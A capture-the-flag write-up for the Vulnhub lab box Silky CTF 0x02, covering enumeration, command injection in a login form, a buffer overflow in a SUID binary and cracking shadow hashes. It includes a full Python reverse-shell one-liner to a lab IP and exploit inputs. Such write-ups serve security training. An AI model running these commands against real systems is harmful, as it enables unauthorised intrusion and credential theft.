Vulnhub Writeup - Silky CTF 0x02

This is the first box on the OSWE track from TJNull’s infamous list.

You can download the box from Vulnhub







Initial Scans

nmap -sn 192.168.21.0/24

Running AutoRecon on the box

sudo $(which autorecon) -vv 192.168.21.129

Open Ports

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)

80/tcp open http syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))

Web site enumeration

There is a default Debian index page



Reviewing the feroxbuster log from AutoRecon on the machine reveals an admin.php page.

feroxbuster -u http://192.168.21.129:80/ -t 10 -w /root/.config/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e

/admin.php







Clicking the login button shows a basic login panel

An invalid user / password combination results in the following error in German:



“Falscher Nutzernamen oder falsches Passwort”

Translation: “Wrong username or wrong password”

Fuzzing the login form



While testing the login page, I ran a basic wfuzz scan to see whether the response differs between usernames.

wfuzz -u "http://192.168.21.129/admin.php?username=FUZZ&password=test" -w /usr/share/wordlists/fasttrack.txt

The results show that the username trust returns a response of a different size from the others, which is worth a closer look.
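The size comparison that makes trust stand out can be sketched in a few lines of Python. This is only an illustration of the idea, not how wfuzz works internally: `find_outliers` is a hypothetical helper, and the sizes in `sample` are made-up numbers rather than values from this box.

```python
from collections import Counter


def find_outliers(sizes):
    """Return the candidates whose response size differs from the most common size.

    `sizes` maps each tried username to the length of the response body.
    """
    if not sizes:
        return []
    # Treat the most frequent size as the "normal" failed-login response.
    baseline, _ = Counter(sizes.values()).most_common(1)[0]
    return sorted(name for name, size in sizes.items() if size != baseline)


# Illustrative numbers only; real values come from the fuzzing run.
sample = {"admin": 1500, "root": 1500, "test": 1500, "trust": 1562}
print(find_outliers(sample))
```

Any username that lands outside the baseline size is a candidate for manual testing in the browser.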

Trying that name in a browser shows a strange error. It looks like the application could be running trust as a command.



Let’s try another Linux command: id

Nice, so it appears this is straight command injection! Trying which python results in the page showing the location of the python binary, so let’s try a python reverse shell.
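To test further commands without retyping them in the form, the request can be built by hand. The sketch below assumes the form submits username and password as GET query parameters, as the wfuzz command above suggests; `build_injection_url` is a hypothetical helper name, and it only constructs the URL rather than sending it.

```python
from urllib.parse import urlencode

# Target and parameter names are taken from the wfuzz command above.
BASE_URL = "http://192.168.21.129/admin.php"


def build_injection_url(command, password="test"):
    """Return the admin.php URL with `command` placed in the username field."""
    # urlencode escapes spaces, quotes and other special characters.
    query = urlencode({"username": command, "password": password})
    return f"{BASE_URL}?{query}"


print(build_injection_url("which python"))
```

URL encoding matters most for longer payloads such as the reverse shell, which contains quotes, semicolons and parentheses.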

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.21.128",1998));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'



On the attacker machine, I have set up a netcat listener with nc -lvnp 1998. Clicking Login on the login form initiates the reverse shell and a quick enumeration of the home folder shows we have read access to the user flag.



I can also see a SUID binary named cat_shadow which seems to suggest it will allow a normal user to read the /etc/shadow file!



Running ./cat_shadow shows the executable is expecting a password.

At this point, I upgrade the shell to a proper TTY, which allows entering longer strings on the command line and responding to input requests from programs.

python -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm-256color



I run strings cat_shadow > cat_strings.txt to see if there is anything really obvious in the binary that looks like it could be a password.

The password might be 0x496c5962

Read as one ASCII character per hex pair, 0x496c5962 translates to “IlYb” (0x49 = I, 0x6c = l, 0x59 = Y, 0x62 = b).
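The same conversion can be checked quickly in Python. This is just a convenience sketch; the variable names are arbitrary.

```python
magic = 0x496C5962

# Split the 32-bit value into its four bytes, most significant first.
raw = magic.to_bytes(4, byteorder="big")
print(raw.decode("ascii"))
```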

Buffer overflow testing





Trying different passwords on the executable, cat_shadow gives some easy hints as to what’s happening. The message 0x00000000 != 0x496c5962 suggests the program is reading a memory location and comparing its contents to the magic value 0x496c5962. So I try longer and longer strings of ‘A’ characters to overflow the buffer and overwrite the memory location being checked. Once the value becomes 0x41414141 (‘AAAA’), I change the final characters to ‘BBBB’ to confirm the correct memory location is being overwritten.



Trying with ‘BBBB’ and ‘CCCC’ to confirm the correct location is being overwritten.

./cat_shadow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC



Trying with the magic ASCII value calculated earlier.

./cat_shadow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIlYb

Since x86 is little endian, multi-byte values are stored least significant byte first, so the four characters need to be supplied in reverse order.

./cat_shadow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbYlI
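The argument can also be generated rather than typed by hand. In the sketch below, `struct.pack` with the `<I` format produces the little-endian byte order directly. `PADDING_LEN` is an assumed value: it should match the number of ‘A’ characters found by trial and error above, and `build_argument` is a hypothetical helper name.

```python
import struct

MAGIC = 0x496C5962
# Assumption: set this to the number of filler characters found by trial and error.
PADDING_LEN = 64


def build_argument(padding_len=PADDING_LEN, magic=MAGIC):
    """Return filler bytes followed by the magic value in little-endian order."""
    padding = b"A" * padding_len
    # "<I" packs an unsigned 32-bit integer least significant byte first.
    return padding + struct.pack("<I", magic)


print(build_argument().decode("ascii"))
```

The printed string can then be passed to the binary, for example via command substitution in the upgraded shell.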

And we get the shadow file!

The shadow file contains the user password hashes, so I can either crack the passwords or try to find a further bug in cat_shadow to change its behaviour.

root:$6$L69RL59x$ONQl06MP37LfjyFBGlQ5TYtdDqEZEe0yIZIuTHASQG/dgH3Te0fJII/Wtdbu0PA3D/RTxJURc.Ses60j0GFyF/:18012:0:99999:7:::

silky:$6$F0T5vQMg$BKnwGPZ17UHvqZLOVFVCUh6CrsZ5Eu8BLT1/uX3h44wtEoDt9qA2dYL04CMUXHw2Km9H.tttNiyaCHwQQ..2T0:18012:0:99999:7:::



Password Hash Cracking

I’ll try to crack the hashes. Reviewing the example_hashes page for hashcat shows that these are type 1800, “sha512crypt $6$, SHA512 (Unix)”.

Here is the hashcat command from my Windows machine. Before running it, paste the lines from the shadow file into a file named silky.hashes:

.\hashcat -a 0 -m 1800 --username .\silky.hashes .\wordlists\rockyou.txt
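The choice of mode 1800 follows from the `$6$` prefix in the hash field. As a rough sketch, the shadow entry can be split apart in Python to make that explicit. `parse_shadow_line` and `HASHCAT_MODES` are hypothetical names, the table covers only three common schemes, and the parser assumes the hash has no `rounds=` parameter.

```python
# Common crypt(3) scheme identifiers mapped to their hashcat modes.
HASHCAT_MODES = {"1": 500, "5": 7400, "6": 1800}


def parse_shadow_line(line):
    """Split one /etc/shadow entry into user, scheme id, salt and hashcat mode."""
    user, hash_field = line.split(":")[:2]
    # Modular crypt format: $<id>$<salt>$<digest> (no rounds= parameter assumed).
    _, scheme, salt, _digest = hash_field.split("$", 3)
    return {
        "user": user,
        "scheme": scheme,
        "salt": salt,
        "mode": HASHCAT_MODES.get(scheme),
    }


root_line = (
    "root:$6$L69RL59x$ONQl06MP37LfjyFBGlQ5TYtdDqEZEe0yIZIuTHASQG/"
    "dgH3Te0fJII/Wtdbu0PA3D/RTxJURc.Ses60j0GFyF/:18012:0:99999:7:::"
)
print(parse_shadow_line(root_line))
```

The `--username` flag in the hashcat command serves a similar purpose: it tells hashcat to skip the leading `root:` or `silky:` field when reading the file.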



And we get the password! Since the shell was upgraded to a tty earlier, it’s possible to use su and type the password.

Up to ten kilograms of cocoons are needed to obtain one kilogram of raw silk.

congratulation

And that’s the box.
